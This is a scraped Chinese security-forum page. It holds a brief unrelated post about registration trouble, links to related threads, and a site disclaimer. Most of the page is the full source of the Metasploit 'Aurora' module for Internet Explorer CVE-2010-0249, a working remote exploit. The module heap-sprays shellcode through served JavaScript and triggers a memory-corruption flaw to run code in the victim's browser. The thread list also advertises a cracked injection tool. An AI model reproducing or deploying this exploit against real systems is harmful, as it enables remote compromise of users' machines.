最近看过此主题的会员

返回列表 发帖

最近郁闷啊

注册个账号都来很多问题,第一个注册了,邮箱没收到,一直是待验证。
现在总算是有个正式账号了

 

您可能还想看的主题:

网站泄密门愈演愈烈 23万人用同一密码123456789

Centos 系统安全配置详解

熊猫卫士本地提权漏洞

个人喜欢的注入工具:WebCruiser2.42(带注册码)

非安全中国网注册邀请码获取方式!

WINHEX15.7中英文安装即可使用,免注册,版本稳定!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pcarm发表,本帖发表者pcarm符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pcarm和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Internet-Explorer-CVE-2010-0249-DOC
Internet Explorer CVE-2010-0249 远程代码执行漏洞  ##  # $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $  ##  ##  # This file is part of the Metasploit Framework and may be subject to  # redistribution and commercial restrictions. Please see the Metasploit  # Framework web site for more information on licensing and terms of use.  #http://metasploit.com/framework/  ##  require 'msf/core'  class Metasploit3 < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::Remote::BrowserAutopwn  autopwn_info({  :ua_name    => HttpClients::IE,  :ua_minver  => "6.0",  :ua_maxver  => "8.0",  :javascript => true,  :os_name    => OperatingSystems::WINDOWS,  :vuln_test  => nil, # no way to test without just trying it  })  def initialize(info = {})  super(update_info(info,  'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',  'Description'    => %q{  This module exploits a memory corruption flaw in Internet Explorer. This  flaw was found in the wild.  },  'License'        => MSF_LICENSE,  'Author'         =>  [  'unknown',  'hdm'      # Metasploit port  ],  'Version'        => '$Revision: 8136 $',  'References'     =>  [  ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],  ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&amp;type=js']  ],  'DefaultOptions' =>  {  'EXITFUNC' => 'process',  },  'Payload'        =>  {  'Space'    => 1000,  'BadChars' => "x00",  'Compat'   =>  {  'ConnectionType' => '-find',  },  'StackAdjustment' => -3500,  },  'Platform'       => 'win',  'Targets'        =>  [  [ 'Automatic', { }],  ],  'DisclosureDate' => 'Jan 14 2009', # wepawet sample  'DefaultTarget'  => 0))  end  def on_request_uri(cli, request)  if (request.uri.match(/.gif/i))  data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]  send_response(cli, data, { 'Content-Type' => 'image/gif' })  return  end  var_memory    = rand_text_alpha(rand(100) + 1)  var_boom      = rand_text_alpha(rand(100) + 1)  var_x1        = rand_text_alpha(rand(100) + 1)  var_e1        = rand_text_alpha(rand(100) + 1)  var_e2        = rand_text_alpha(rand(100) + 1)  var_comment   = rand_text_alpha(rand(100) + 1);  var_abc       = rand_text_alpha(3);  var_ev1       = rand_text_alpha(rand(100) + 1)  var_ev2       = rand_text_alpha(rand(100) + 1)  var_sp1       = rand_text_alpha(rand(100) + 1)  var_unescape  = rand_text_alpha(rand(100) + 1)  var_shellcode = rand_text_alpha(rand(100) + 1)  var_spray     = rand_text_alpha(rand(100) + 1)  var_start     = rand_text_alpha(rand(100) + 1)  var_i         = rand_text_alpha(rand(100) + 1)  rand_html     = rand_text_english(rand(400) + 500)  html = %Q|<html>  <head>  <script>  var #{var_comment} = "COMMENT";  var #{var_x1} = new Array();  for (i = 0; i < 200; i ++ ){  #{var_x1} = document.createElement(#{var_comment});  #{var_x1}.data = "#{var_abc}";  };  var #{var_e1} = null;  var #{var_memory} = new Array();  var #{var_unescape} = unescape;  function #{var_boom}() {  var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');  var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );  do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );  for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};  }  function #{var_ev1}(evt){  #{var_boom}();  #{var_e1} = document.createEventObject(evt);  document.getElementById("#{var_sp1}").innerHTML = "";  window.setInterval(#{var_ev2}, 50);  }  function #{var_ev2}(){  p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";  for (i = 0; i < #{var_x1}.length; i ++ ){  #{var_x1}.data = p;  }  var t = #{var_e1}.srcElement;  }  </script>  </head>  <body>  <span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>  </body>  </html>  |  # Transmit the compressed response to the client  send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })  # Handle the payload  handler(cli)  end  end


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表